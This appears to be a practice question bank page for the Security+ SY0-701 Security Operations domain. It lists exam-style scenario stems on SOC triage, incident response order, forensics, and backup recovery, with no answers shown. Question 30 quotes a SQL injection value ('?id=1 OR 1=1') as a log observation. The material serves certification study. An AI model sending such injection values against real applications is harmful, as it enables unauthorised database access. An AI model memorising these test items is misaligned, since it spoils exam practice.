Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

← Security Operations practice sets

SY0-701 Security Operations • Complete Question Bank

SY0-701 Security Operations — All Questions With Answers

Complete SY0-701 Security Operations question bank — all 0 questions with answers and detailed explanations.

291
Questions
Free
No signup
Certifications/SY0-701/Practice Test/Security Operations/All Questions
Question 1mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst receives an alert from the EDR system indicating that the process 'C:\Program Files\Vendor\Updater.exe' attempted to modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key on a user's workstation. The analyst checks the file hash and finds it matches a known legitimate software updater. Which of the following actions is most appropriate for the analyst to take?

Question 2mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst is reviewing logs from a Windows domain controller and notices a large number of failed logon attempts (Event ID 4625) from a single source IP address within a five-minute window. The account names used are random strings such as "a1b2c3", "x9y8z7", etc. The analyst then checks the source IP and finds it is a known external address from a foreign country. Which of the following is the most appropriate next step for the analyst to take?

Question 3mediummultiple choice
Read the full Security Operations explanation →

A security operations analyst is tuning a SIEM correlation rule designed to detect brute-force password attacks against domain user accounts. The current rule generates an alert when a single user account has more than 10 failed logon attempts within a 5-minute window. The SOC team is overwhelmed by thousands of alerts each day, the vast majority of which are triggered by legitimate users who accidentally mistype their passwords. Which of the following modifications to the rule would most effectively reduce false positives while still detecting actual brute-force attacks?

Question 4mediummultiple choice
Read the full Security Operations explanation →

A security analyst is responding to a potential ransomware incident on a Windows server that is still running. The analyst needs to preserve forensic evidence for analysis. Which of the following actions should the analyst perform first, based on the order of volatility?

Question 5mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst is monitoring logs from the cloud access security broker (CASB) and observes that a user account downloaded 500 GB of data from a highly sensitive SharePoint document library within a single hour. The user's historical baseline shows an average daily download of less than 10 MB. Additionally, the log shows the session originated from an IP address in a country where the company has no employees or business operations. Which of the following actions is the most appropriate for the analyst to take?

Question 6mediummultiple choice
Read the full DNS explanation →

A security analyst in the SOC is investigating a potential DNS tunneling incident. The analyst has identified a workstation that is making thousands of DNS queries to an external domain with base64-encoded subdomains. The analyst suspects that sensitive files from the workstation are being exfiltrated by encoding their contents into the subdomains of the DNS queries. Which of the following log sources will provide the most definitive evidence to confirm that the contents of a specific sensitive file are being transmitted in the DNS queries?

Question 7mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst is reviewing network flow logs and notices a series of outbound connections from a single internal workstation to an external IP address on TCP port 443. The connections occur every 5 minutes, each lasting about 2 seconds, and the amount of data transferred per connection is consistently around 1 KB. The workstation's user reports no unusual activity. The analyst checks the host's EDR logs and sees no malicious processes or known indicators. Which type of activity is this pattern most consistent with?

Question 8mediummultiple choice
Read the full VPN explanation →

A security analyst in the SOC is reviewing an alert from the corporate VPN server. The alert indicates that user 'jsmith' authenticated successfully from an IP address in Brazil at 14:30 UTC. The analyst contacts jsmith, who confirms he is physically in the company's headquarters in Chicago and has not remotely accessed the VPN today. The VPN authentication logs show that jsmith's session used a valid smart card certificate for authentication. The analyst checks the certificate revocation list and finds that jsmith's certificate has not been revoked. Which of the following is the most likely explanation for this event?

Question 9mediummultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing the perimeter firewall logs. The analyst observes repeated TCP SYN packets from a single external IP address (203.0.113.50) to multiple internal IP addresses on TCP port 3389. The packets are sent with a consistent 50-millisecond interval. There are no subsequent SYN-ACK or RST packets from the internal hosts in the logs. The analyst suspects this is a reconnaissance scan. Which of the following additional log sources would provide the most definitive evidence to confirm this suspicion?

Question 10mediummultiple choice
Read the full Security Operations explanation →

A digital forensics analyst is investigating a suspected insider threat. The analyst has acquired a laptop used by the suspect. The analyst needs to obtain a forensic image of the hard drive without altering any data. The laptop is running and logged into the suspect's user account. Which of the following is the most appropriate first step for the analyst to take?

Question 11mediummultiple choice
Read the full Security Operations explanation →

A security analyst receives an alert from the intrusion detection system indicating that a workstation in the finance department has established an outbound connection to a known malicious IP address using an encrypted protocol. The analyst verifies the alert and checks the user's activity logs, which show no legitimate business reason for the connection. According to the incident response process, what should the analyst do NEXT?

Question 12mediummultiple choice
Read the full Security Operations explanation →

A security analyst at a financial firm detects an unusual spike in outbound network traffic from a database server that normally only communicates with internal web servers. The traffic is directed to numerous external IP addresses in various countries. According to established incident response procedures, what should be the analyst's immediate next step?

Question 13mediummultiple choice
Read the full Security Operations explanation →

A security analyst receives an alert from the intrusion detection system (IDS) indicating a high volume of outbound traffic from a single internal workstation to an external IP address known to be associated with a command-and-control (C2) server. The workstation's user reports no unusual activity. Which of the following should the analyst do FIRST?

Question 14mediummultiple choice
Read the full Security Operations explanation →

A security analyst notices repeated failed login attempts to a critical database server from a single external IP address over the past hour. The analyst reviews the authentication logs and sees that the account name used in each attempt is 'admin'. Which of the following security controls should the analyst recommend to mitigate this type of attack with minimal impact on legitimate users?

Question 15mediummultiple choice
Read the full Security Operations explanation →

A security analyst receives multiple alerts indicating that several users in the finance department clicked a malicious link in an email. The analyst has confirmed the email subject line and sender address. Which of the following is the BEST first step to contain the incident?

Question 16mediummultiple choice
Read the full Security Operations explanation →

A security analyst receives an automated alert indicating that a standard user account logged in from a geographic location that is unusual for the user, and the login occurred at 3:00 AM local time. The analyst has not yet verified whether this was a successful login or if any additional suspicious activity occurred. According to standard incident response procedures, what should the analyst do NEXT?

Question 17mediummultiple choice
Read the full Security Operations explanation →

A security analyst detects unusual outbound traffic from a workstation that appears to be communicating with a known malicious IP address. The analyst immediately isolates the workstation from the network. Which of the following is the NEXT step in the incident response process according to NIST SP 800-61?

Question 18mediummultiple choice
Read the full Security Operations explanation →

An organization's file server contains sensitive HR data. The security team discovers that permissions on a confidential folder have been altered. Which of the following security controls would MOST likely help determine the account responsible for this change?

Question 19mediummultiple choice
Read the full Security Operations explanation →

A security analyst detects a high volume of failed authentication attempts from IP address 203.0.113.1 against a web application. The attempts use different usernames, such as 'admin', 'root', 'test', and several common names. Account lockout policies are configured to lock an account after five failed attempts. Despite this, the analyst sees the attempts continuing over several hours. Which of the following security controls is most likely missing or improperly configured?

Question 20mediummultiple choice
Read the full Security Operations explanation →

A security analyst receives an alert about a user account that has been attempting to authenticate from an unusual geographic location outside of business hours. The analyst reviews the event logs and sees that the authentication attempt was successful, but the user has not reported any suspicious activity. Which of the following actions should the analyst take NEXT?

Question 21mediummultiple choice
Read the full NAT/PAT explanation →

A help desk technician reports that a user's account was locked out three times overnight. The security team reviews the authentication logs and discovers that the lockouts resulted from failed login attempts originating from a single external IP address, each attempt using a slightly different variation of the user's password. Which of the following should the security analyst do FIRST?

Question 22mediummultiple choice
Read the full Security Operations explanation →

A security analyst detects an encrypted outbound connection from a web server to an unknown IP address. The connection is persistent and occurs every 5 minutes. What is the MOST appropriate first step for the analyst to take?

Question 23mediummultiple choice
Read the full Security Operations explanation →

A security analyst in the SOC observes a sudden spike in failed authentication attempts from a single external IP address targeting multiple user accounts over the last 30 minutes. After confirming the logs are accurate, which of the following actions should the analyst take FIRST according to standard incident response procedures?

Question 24mediummultiple choice
Read the full Security Operations explanation →

A security analyst detects repeated outbound traffic from a single workstation to an IP address listed on a public threat intelligence feed as a known command-and-control server. The user reports that the workstation is behaving slowly and that antivirus software is up to date. According to incident response best practices, what should the analyst do FIRST?

Question 25mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst is investigating an alert triggered when a user clicked a link in an email. The email appeared to be from a trusted vendor and included a PDF attachment with a macro, but the user did not run the macro. Upon reviewing the email headers, the analyst notices that the sender's domain is a common misspelling of the vendor's legitimate domain. Which of the following is the most direct indicator that this email is a phishing attempt?

Question 26mediummultiple choice
Read the full Security Operations explanation →

A security analyst in a SOC receives an alert indicating that a large volume of data was transferred from a user's workstation to an external IP address at 2:00 AM. The analyst suspects a data exfiltration attack. According to incident response best practices, what should the analyst do FIRST?

Question 27mediummultiple choice
Read the full Security Operations explanation →

A security analyst receives an alert that a user clicked a link in a phishing email and entered their corporate credentials on a fake login page. Which of the following should the analyst do FIRST to minimize further damage?

Question 28mediummultiple choice
Read the full Security Operations explanation →

A security analyst notices a sudden increase in outbound traffic from a database server that normally only communicates with internal application servers. The server is running a standard OS with no recent changes. Which of the following actions should the analyst take FIRST to determine if the server is compromised?

Question 29mediummultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing authentication logs from a corporate web application. The logs show that over a span of two hours, a single external IP address attempted to log in with 500 different usernames, each using the same password 'Spring2024!'. Only a few of these attempts succeeded. Which type of attack is most likely being observed?

Question 30mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst is reviewing web server logs after a user reports that the company website displayed an error message containing raw database queries. The log shows repeated requests to the product search page with the following parameter: `?id=1 OR 1=1`. Which of the following should the analyst do FIRST to confirm the nature of the suspected attack?

Question 31mediummultiple choice
Read the full Security Operations explanation →

A security analyst detects real-time data exfiltration from a critical production database that supports customer transactions. The exfiltration appears to be occurring via a compromised application service account. Which containment strategy should the analyst implement FIRST to minimize damage while preserving forensic data?

Question 32mediummultiple choice
Read the full Security Operations explanation →

A security analyst receives an alert that a user's workstation is communicating with a known malicious IP address during off-hours. The analyst reviews the firewall logs and confirms the connection was established. Which of the following should the analyst perform NEXT to contain the threat?

Question 33mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst observes a pattern where an account exhibits multiple failed login attempts from an IP address in a foreign country, followed by a successful login from the same account but from a different IP address in another foreign country minutes later. The analyst wants to deploy a control that can automatically detect and alert on this type of anomalous user behavior, even if the individual login events are not blocked by existing rules. Which of the following security controls is BEST suited for this task?

Question 34mediummultiple choice
Read the full Security Operations explanation →

A security analyst notices that a phishing campaign is targeting employees with emails that appear to be from the company's IT support team. The emails contain a link to a website that mimics the corporate password reset portal. Which of the following controls would be MOST effective in preventing users from reaching the malicious website, assuming the link uses HTTPS?

Question 35mediummultiple choice
Read the full Security Operations explanation →

A security analyst notices repeated attempts to copy large amounts of data to USB drives from a user's workstation. The analyst suspects the user may be exfiltrating company proprietary data. The company wants to implement a technical control that can both detect and block such data exfiltration without completely disabling all USB ports, as some users require USB for authorized work. Which of the following would best meet this requirement?

Question 36mediummultiple choice
Read the full Security Operations explanation →

A security analyst detects that multiple workstations in the finance department are displaying ransom notes and files are being encrypted. The analyst has disconnected the affected workstations from the network. Which of the following should the analyst do next according to the incident response procedure?

Question 37mediummultiple choice
Read the full Security Operations explanation →

A security analyst observes a critical server generating unusually high outbound traffic to an external IP address that is listed on a threat intelligence feed as a known command-and-control server. The analyst suspects the server is compromised. According to standard incident response procedures, what should the analyst do NEXT?

Question 38mediummultiple choice
Read the full DNS explanation →

A security analyst at a financial firm notices a significant increase in DNS queries from an internal server to a rarely visited external domain. The queries are for unusual subdomain names that contain encoded data. The server is not a DNS server and does not typically generate outbound traffic. Which of the following is the MOST appropriate immediate action for the analyst to take?

Question 39hardmultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing firewall logs and notices repeated connection attempts from a single external IP address to multiple internal IP addresses on TCP port 22 (SSH). Each attempt uses a different username but the same password: 'Spring2024!'. The attempts occur sporadically over a 12-hour period. Which type of attack is most likely being observed?

Question 40mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst detects that a user's workstation is sending large volumes of data to an unusual external IP address during non-business hours. The analyst has already isolated the workstation by disconnecting it from the network. What is the NEXT step in the incident response process?

Question 41mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst is reviewing authentication logs and observes multiple failed login attempts for a single user account occurring within a short timeframe, followed by a successful login from an IP address located in a country where the user has never traveled. The failed attempts originate from various IP addresses and use different passwords. Which type of attack has most likely occurred?

Question 42mediummultiple choice
Read the full Security Operations explanation →

A security analyst notices unusual outbound traffic from a server that normally only communicates with internal clients. The traffic is encrypted and goes to an external IP address not on any blocklists. The analyst also finds a new scheduled task on the server that runs a PowerShell script. Which of the following best describes the analyst's immediate next step in the incident response process?

Question 43mediummultiple choice
Read the full Security Operations explanation →

A security analyst at a manufacturing company notices multiple workstations generating high volumes of encrypted outbound traffic and displaying ransom notes. The analyst suspects a ransomware outbreak. According to the incident response process, which of the following should the analyst perform FIRST?

Question 44mediummultiple choice
Read the full Security Operations explanation →

A security analyst detects unusual outbound traffic from a workstation to an external IP address known for command and control. The analyst has verified the alert and wants to contain the threat. According to the NIST SP 800-61 incident response process, which of the following steps should the analyst take FIRST?

Question 45mediummultiple choice
Read the full Security Operations explanation →

During malware response on a finance workstation, the system is still powered on and connected. The manager asks whether you can just reboot it to stop the issue. What is the best next step?

Question 46mediummultiple choice
Read the full Security Operations explanation →

A privileged account is used on a jump box at 02:15, and the SIEM shows multiple interactive logons from the same account to different servers within 10 minutes. The administrator says they used a password vault for the session. Which log source best confirms whether the access was authorized?

Question 47mediummultiple choice
Read the full Security Operations explanation →

After confirming malicious activity on a workstation, the incident lead wants the system cleaned up quickly. The analyst has not yet collected any volatile data. What should the analyst do before remediation begins?

Question 48mediummultiple choice
Study the full virtualization explanation →

After restoring a virtualized file server from backup, users can log in but the accounting application returns database consistency errors. What should you do next?

Question 49mediummultiple choice
Read the full Security Operations explanation →

A web application was updated at 10:00. At 10:05, the SIEM reports a sharp rise in HTTP 500 errors and WAF blocks from the same source range. The application owner says customers are seeing failures only on the new checkout page. What is the best next step?

Question 50mediummulti select
Read the full Security Operations explanation →

EDR flags a word processor that launched encoded PowerShell and then made an outbound HTTPS connection to a rare domain. Which two actions should the analyst take first from the EDR console? Select two.

Question 51mediummultiple choice
Read the full Security Operations explanation →

Security receives a company laptop used in an insider theft investigation. A manager wants the device moved to another office for review by legal staff. Which action best supports chain of custody?

Question 52mediummultiple choice
Read the full Security Operations explanation →

After restoring a virtual file server from last night’s backup, users can browse shares, but finance reports that several spreadsheet edits from yesterday are missing. What should the administrator verify next before declaring the restore successful?

Question 53mediummulti select
Read the full Security Operations explanation →

A firewall rule was changed in production to allow a new vendor IP range, and payroll users immediately lost access to an internal service. Which two change-management practices would have reduced the risk of this outage? Select two.

Question 54easymultiple choice
Read the full Security Operations explanation →

An investigator needs a copy of a suspect laptop drive for analysis without changing the original media. What should be used?

Question 55mediummulti select
Read the full Security Operations explanation →

A SIEM alert shows five failed logins to a SaaS admin portal from one IP, followed by a successful login from a new city three minutes later. Which two actions are the best next steps for the analyst to validate the event before containment? Select two.

Question 56easymultiple choice
Read the full Security Operations explanation →

A workstation is suspected of malware infection, and it is still powered on and connected to the network. Which action best preserves volatile evidence before the system is shut down?

Question 57mediummulti select
Read the full Security Operations explanation →

After restoring a virtual file server from backup, users can log in and browse shares, but finance says the last day's edits are missing. Which two steps should the administrator take before declaring recovery complete? Select two.

Question 58mediummultiple choice
Study the full ACL explanation →

A firewall ACL must be modified in production to allow a vendor update server. The team wants to minimize the chance of accidentally blocking payroll traffic. Which change-management step is best before applying the rule?

Question 59mediummulti select
Read the full Security Operations explanation →

A Windows server is still running after suspected compromise. Before it is powered down, which two volatile data sources should be collected first? Select two.

Question 60mediummulti select
Read the full Security Operations explanation →

A company-owned laptop is being transferred from the incident site to the evidence locker for a theft investigation. Which two actions best support chain of custody during transport? Select two.

Question 61mediummultiple choice
Read the full Security Operations explanation →

After restoring a virtual file server from backup, users can browse folders, but an accounting application reports missing recent transactions. What should the administrator do next?

Question 62mediummulti select
Read the full Security Operations explanation →

A firewall rule was added directly in production to allow a new vendor IP range, and an internal service stopped responding because the new rule was placed above an existing deny rule. Which two change-management practices would have reduced the risk? Select two.

Question 63mediummultiple choice
Read the full Security Operations explanation →

An investigator receives a suspect laptop drive that may be used in court. Which approach best supports a forensically sound image while protecting the original media?

Question 64mediummultiple choice
Read the full Security Operations explanation →

An administrator pushed a firewall rule change to allow a new vendor IP range during business hours. Minutes later, payroll users lost access to an internal service. Which change management practice would have best reduced the impact?

Question 65easymultiple choice
Read the full Security Operations explanation →

A SIEM alert shows five failed logins to an administrator account, followed by a successful login from a new city three minutes later. The account owner says they did not sign in. What should the analyst do first?

Question 66hardmulti select
Read the full Security Operations explanation →

A privileged cloud administrator account shows two suspicious events: an API key was created from an unfamiliar IP address, and a mailbox forwarding rule was added five minutes later. The account is still active and may be in attacker control. Which two actions should the analyst take first to preserve evidence while limiting additional abuse? Select two.

Question 67mediummultiple choice
Read the full Security Operations explanation →

You are handed a company laptop suspected in an insider theft case. Legal says the evidence may be needed in court. Which action best preserves admissibility?

Question 68hardmulti select
Read the full Security Operations explanation →

A virtual file server was restored from last night’s backup. The service is online, but some finance users report missing spreadsheet changes and a few files show a 'recovered copy' timestamp. Which two checks should be completed before the team accepts the restore as successful? Select two.

Question 69mediummultiple choice
Read the full Security Operations explanation →

After a new MFA policy rollout, the SIEM generates an alert for five failed logins to a SaaS admin portal from one IP, followed by a successful login to the same account from an IP in another country. The account owner says they were in meetings all day. What should the analyst do first?

Question 70mediummultiple choice
Read the full Security Operations explanation →

A firewall rule change was implemented directly in production to allow a new vendor IP range. Within minutes, several internal services became unreachable because the rule order changed unexpectedly. Which change-management practice would have most likely prevented this outage?

Question 71mediummultiple choice
Read the full wireless explanation →

A finance laptop is powered on, the user is still logged in, and it remains connected to Wi-Fi after a malware alert. What should the responder do first to preserve volatile evidence?

Question 72easymultiple choice
Read the full wireless explanation →

A laptop is suspected of being used in a malware incident. It is still powered on and connected to Wi-Fi. What should the responder do before shutting it down?

Question 73easymultiple choice
Read the full Security Operations explanation →

A Linux server starts showing many failed SSH logins from one source IP address. Which log source should the analyst review first?

Question 74mediummultiple choice
Read the full Security Operations explanation →

EDR alerts on a remote laptop show a suspicious process attempting to dump browser credentials and then contacting a rare domain. The user is in another time zone and still needs the laptop online for a presentation later today. What containment action is best?

Question 75hardmulti select
Read the full Security Operations explanation →

A server is suspected of being used for lateral movement after the SOC notices dozens of failed SSH logons, then a successful login from a new source IP, followed by new outbound SMB connections to internal hosts. The system is still running. Which two items should be collected first before any reboot or remediation? Select two.

Question 76mediummultiple choice
Read the full Security Operations explanation →

Security receives a company-owned laptop connected to an insider theft investigation. Before the device is transported to the evidence locker, what is the BEST action to support chain of custody?

Question 77hardmulti select
Read the full Security Operations explanation →

An investigator receives a suspect laptop that may be needed in court. The goal is to create a forensic image without changing the original drive contents. Which three actions best support chain of custody and evidence integrity? Select three.

Question 78hardmulti select
Read the full Security Operations explanation →

A SIEM correlation rule fires for a Microsoft 365 executive mailbox. At 02:14, the account signs in from a new country. At 02:17, the mailbox gets a forwarding rule that sends all mail to an external address. The user says they did not travel and did not create any rules. Which two log sources should the analyst review first to confirm whether this is account takeover or token abuse? Select two.

Question 79mediummulti select
Read the full Security Operations explanation →

A finance workstation is suspected of running malware. It is still powered on, the user is logged in, and the network cable is connected. Which two actions best preserve volatile evidence before shutdown? Select two.

Question 80mediummultiple choice
Read the full NAT/PAT explanation →

A vulnerability scan identifies a critical patch for a fleet of internet-facing servers. The operations lead wants to apply it immediately during peak business hours because the exploit is public. What is the BEST next step?

Question 81mediummultiple choice
Read the full VPN explanation →

A SIEM alert shows a successful VPN login for an executive account from an unusual country, followed 3 minutes later by large downloads from a file share the user rarely accesses. Which log source should the analyst review next to determine whether the session came from the user's assigned laptop or an unmanaged device?

Question 82mediummultiple choice
Read the full Security Operations explanation →

EDR detects encoded PowerShell launched from a word processor, a process attempt to read LSASS memory, and an outbound HTTPS connection to a rare domain. What should the analyst do first?

Question 83hardmulti select
Read the full network assurance explanation →

EDR on a finance workstation shows Outlook launching mshta.exe, followed by a scheduled task named UpdateSvc_91 and repeated HTTPS beacons to a newly registered domain. The user is still working and has not rebooted. Which two telemetry sources would best help the analyst confirm the initial execution path and determine whether the host has communicated with other suspicious infrastructure? Select two.

Question 84mediummultiple choice
Read the full Security Operations explanation →

EDR flags a workstation after a word processor launches encoded PowerShell and the host begins contacting a rare domain over HTTPS. The user is still active. What is the best containment action from the EDR console?

Question 85mediummulti select
Read the full Security Operations explanation →

An EDR alert shows suspicious PowerShell activity on a remote employee laptop, and the user is still logged in to cloud applications. Which two response actions are best if the device is believed to be actively compromised? Select two.

Question 86mediummultiple choice
Read the full Security Operations explanation →

A SIEM correlates three failed MFA prompts for a payroll admin account from one IP, a successful login two minutes later from the same IP, and a new mailbox forwarding rule to an external address. What is the best immediate action?

Question 87easymultiple choice
Read the full Security Operations explanation →

An administrator wants to add a new vendor IP range to a firewall rule in production. What is the best change-management step to reduce risk?

Question 88mediummultiple choice
Read the full Security Operations explanation →

During malware containment, an analyst needs to preserve transient information from a compromised Windows workstation that is still running. Which action is MOST appropriate before shutdown or imaging?

Question 89mediummulti select
Read the full Security Operations explanation →

A SIEM alert shows a successful sign-in to a cloud admin portal from an unusual country, followed by mailbox forwarding-rule changes four minutes later. Which two log sources should the analyst review first to confirm whether the account was abused? Select two.

Question 90hardmulti select
Read the full Security Operations explanation →

EDR reports that a workstation launched PowerShell from a word processor, created a scheduled task named WinUpdateSvc, and began making repeated HTTPS connections to a rare external domain. The user is still logged in to several cloud apps. Which two response actions are best to initiate from the EDR console? Select two.

Question 91mediummulti select
Read the full Security Operations explanation →

An investigator needs to make a forensic image of a suspect laptop without changing the original drive contents. Which two practices should be used? Select two.

Question 92mediummultiple choice
Read the full Security Operations explanation →

An employee reports a ransomware note on a file server. The server is still powered on, shares are still being accessed, and management wants service restored as quickly as possible. What should the incident response team do first?

Question 93hardmulti select
Read the full wireless explanation →

A Windows laptop is believed to be involved in a credential-theft incident. It is still powered on, connected to Wi-Fi, and the user reports that the screen recently locked by itself. The SOC can reach the device remotely through EDR. Which two actions should be taken before the laptop is shut down? Select two.

Question 94mediummultiple choice
Read the full Security Operations explanation →

Several Windows servers were built from the same image, and all of them use the same local Administrator password. What is the best operational hardening change?

Question 95easymultiple choice
Read the full Security Operations explanation →

EDR flags a workstation because a word processor launched an unusual script and then contacted a rare external domain. What is the best immediate action?

Question 96easymultiple choice
Read the full Security Operations explanation →

During a disaster recovery test, what is the most important thing to confirm about the backup?

Question 97mediummultiple choice
Read the full Security Operations explanation →

A SIEM reports a successful sign-in to a SaaS admin portal from a new country, followed three minutes later by multiple configuration changes to mailbox forwarding rules. The account owner says they were in the office and did not approve any changes. What should the analyst check next?

Question 98mediummultiple choice
Read the full Security Operations explanation →

A SIEM alert flags an interactive logon to a Windows file server from a service account that normally only runs scheduled tasks. The alert occurred at 01:12, but the maintenance window for that server is every Sunday at 02:00. The account also accessed a different server five minutes later. What should the analyst do first?

Question 99mediummultiple choice
Read the full Security Operations explanation →

EDR flags encoded PowerShell launched by a spreadsheet application, followed by an attempt to access LSASS and outbound HTTPS traffic to a rare domain. What should the analyst do first from the EDR console?

Question 100easymultiple choice
Read the full Security Operations explanation →

A firewall rule must be changed to allow a vendor update server. Which step best reduces the chance of an unexpected outage?

Question 101mediummulti select
Read the full Security Operations explanation →

A company-owned laptop is suspected in an insider theft case and legal says the evidence may be used in court. Which two actions best support evidence admissibility during transport to the evidence locker? Select two.

Question 102easymultiple choice
Read the full Security Operations explanation →

A new SIEM rule generates many alerts from a scheduled backup job that is known to be legitimate. What should the analyst do to improve alert quality?

Question 103easymultiple choice
Read the full Security Operations explanation →

A company laptop is collected as evidence in a suspected theft case. Which action best supports chain of custody?

Question 104mediummulti select
Read the full Security Operations explanation →

EDR flags encoded PowerShell launched by a spreadsheet application and an outbound HTTPS connection to a rare domain. Which two response actions are best to take from the EDR console first? Select two.

Question 105mediummulti select
Read the full Security Operations explanation →

After restoring a virtual file server from backup, users can open shares, but the accounting application shows the previous day's transactions are missing. Which two steps should the administrator take next? Select two.

Question 106easymultiple choice
Read the full Security Operations explanation →

After a file server is restored from backup, users can open the share, but the business wants to be sure the recovery was successful. What should the administrator verify next?

Question 107mediummultiple choice
Read the full wireless explanation →

An employee reports a ransomware note on a finance laptop. The laptop is still powered on, connected to Wi-Fi, and the user says they were just working in a spreadsheet. Management wants the fastest safe response that also preserves evidence. What should the responder do first?

Question 108easymultiple choice
Read the full Security Operations explanation →

EDR shows encoded PowerShell launched by a word processor and an outbound connection to a rare domain. What is the best immediate containment action?

Question 109mediummulti select
Read the full Security Operations explanation →

A new SIEM rule generates hundreds of alerts from a scheduled backup job that is known to be legitimate. Which two tuning changes are the best ways to reduce noise without losing visibility into real abuse? Select two.

Question 110easymultiple choice
Read the full Security Operations explanation →

A SIEM alert shows a payroll administrator account signed in at 02:10 from a country the employee has never visited. The employee says they are on vacation at home and did not travel. What should the analyst do first?

Question 111mediummultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which improvement best aligns the current backup design with the stated recovery targets?

Exhibit

Disaster recovery review for the customer billing platform

Current backup design:
- Full backup once per day at 23:00
- Backups stored on the same storage cluster as production VM snapshots
- Backup administrator account is shared by the operations team
- Restore test cadence: none in the last 12 months
- Current measured restore time from bare metal: 7 hours

Business recovery targets:
- RTO: 2 hours
- RPO: 15 minutes
Question 112hardmultiple choice
Read the full NAT/PAT explanation →

Based on the exhibit, what is the most likely SOC conclusion and next action?

A scheduled alert fired on a server that repeatedly connects to a vendor update site at fixed intervals. The security team wants to know whether the alert represents a real threat or a harmless operational pattern.

Exhibit

10:00:02 patch-srv-12  service 'AcmePatchAgent' started by NT AUTHORITY\SYSTEM
10:00:05 patch-srv-12  DNS query: updates.acmecorp.com -> 198.51.100.44
10:00:05 patch-srv-12  outbound TLS connection to 198.51.100.44:443
10:00:07 SIEM rule 'possible beaconing every 15 minutes' triggered
10:15:03 patch-srv-12  DNS query: updates.acmecorp.com -> 198.51.100.44
10:15:03 patch-srv-12  outbound TLS connection to 198.51.100.44:443
10:15:04 EDR metadata: process hash matches approved vendor signature
CMDB: Asset group = Patch Management Server; maintenance window = daily 10:00-10:30
Question 113mediummultiple choice
Read the full Security Operations explanation →

An ERP database is backed up nightly to a NAS that remains online and is managed with the same admin group as production servers. After a ransomware incident, management wants the most effective change to improve recovery assurance without redesigning the whole environment. What should be implemented?

Question 114mediummultiple choice
Read the full Security Operations explanation →

An internal finance application has an RTO of 2 hours and an RPO of 30 minutes. Current backups restore in about 6 hours because the team must rebuild the server from scratch. Which change best aligns the recovery design to the business requirement?

Question 115mediummultiple choice
Read the full Security Operations explanation →

During morning SIEM review, an analyst sees 37 failed SSH logins followed by a successful login to a Linux server from a jump host. The account belongs to a configuration-management service account, and the activity occurred inside the normal maintenance window. What should the analyst do next to determine whether the alert is a true positive or a false positive?

Question 116mediummulti select
Read the full Security Operations explanation →

After isolating an infected endpoint and collecting volatile memory, the team identifies a malicious browser extension and a scheduled task used for persistence. Which two actions belong in the eradication phase before returning the system to service? Select two.

Question 117mediummultiple choice
Read the full VPN explanation →

A monthly scan finds a critical remote-code-execution vulnerability on an internet-facing VPN appliance. The vendor has not released a patch for six weeks, but the service must stay online. Which short-term action is the best risk treatment?

Question 118mediummultiple choice
Read the full Security Operations explanation →

A billing application has an RTO of 2 hours and an RPO of 30 minutes. The current recovery method requires rebuilding the VM from scratch and then restoring last night's backup, which takes over six hours. Which solution best meets the stated recovery objectives?

Question 119mediummulti select
Read the full Security Operations explanation →

A weekly vulnerability scan returns five findings across different systems. Which three should be remediated first? Select three.

Question 120mediummultiple choice
Read the full Security Operations explanation →

During a restore test, a technician brings back a file server successfully, but the application team discovers that the database is missing the last 12 hours of transactions. Management says the business can tolerate only one hour of data loss. What should be changed first?

Question 121mediummultiple choice
Read the full Security Operations explanation →

A help desk ticket confirms that a user entered corporate credentials into a fake sign-in page. Minutes later, the security team finds a new mailbox forwarding rule and evidence that the attacker added backup MFA codes. After disabling the account, what should the team do next to support containment and recovery?

Question 122hardmultiple choice
Read the full NAT/PAT explanation →

Based on the exhibit, which temporary control best reduces risk until the patch is released?

Exhibit

Server: HR-APP02
Finding: Outdated OpenSSL library with a critical remotely exploitable weakness
Vendor status: Fix unavailable for 21 days
Exposure: The service must remain online
Current access: host firewall allows TCP 443 from any source
Monitoring: Monthly vulnerability scans only
Available controls: reverse proxy, WAF, IP allow lists, jump host for administration
Question 123hardmultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which change best moves the ERP recovery design toward meeting both recovery targets?

Exhibit

ERP database protection summary:
- Required RTO: 2 hours
- Required RPO: 15 minutes
- Current backup schedule:
  * Full backup every Sunday at 01:00
  * Differential backup daily at 01:00
  * Transaction log backup every 30 minutes
- Estimated restore time from backup media: 90 minutes after media is available
- No standby server exists
- Restore testing occurs once per year
Question 124mediummultiple choice
Read the full Security Operations explanation →

The SOC has contained a mailbox compromise by resetting the password and revoking active sessions. Investigation shows the attacker created an automatic forwarding rule and added an OAuth consent grant. What should happen next to eradicate the threat?

Question 125mediummultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which change best helps the company meet its recovery objectives after a ransomware event?

Exhibit

Backup status for the billing application

Current design:
